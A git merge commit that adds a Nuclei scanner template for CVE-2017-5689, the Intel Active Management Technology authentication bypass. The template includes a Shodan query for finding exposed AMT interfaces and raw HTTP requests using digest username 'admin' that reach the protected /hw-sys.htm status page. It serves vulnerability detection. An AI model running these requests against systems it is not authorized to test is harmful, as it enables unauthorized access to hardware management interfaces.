Merge pull request #5670 from projectdiscovery/CVE-2017-5689

Added CVE-2017-5689

cves/2017/CVE-2017-5689.yaml

@@ -0,0 +1,46 @@
+id: CVE-2017-5689
+
+info:
+  name: Intel Active Management Technology - Authentication Bypass
+  author: pdteam
+  severity: critical
+  description: |
+    An unprivileged network attacker could gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT).
+  reference:
+    - https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr
+    - https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability
+    - https://www.embedi.com/news/mythbusters-cve-2017-5689
+    - https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2017-5689
+  metadata:
+    verified: true
+    shodan-query: title:"Active Management Technology"
+  tags: cve,cve2017,amt,intel,tenable,kev
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /hw-sys.htm HTTP/1.1
+        Host: {{Hostname}}
+
+    digest-username: admin
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "System Status"
+          - "Active Management Technology"
+        condition: and
+
+      - type: status
+        status:
+          - 200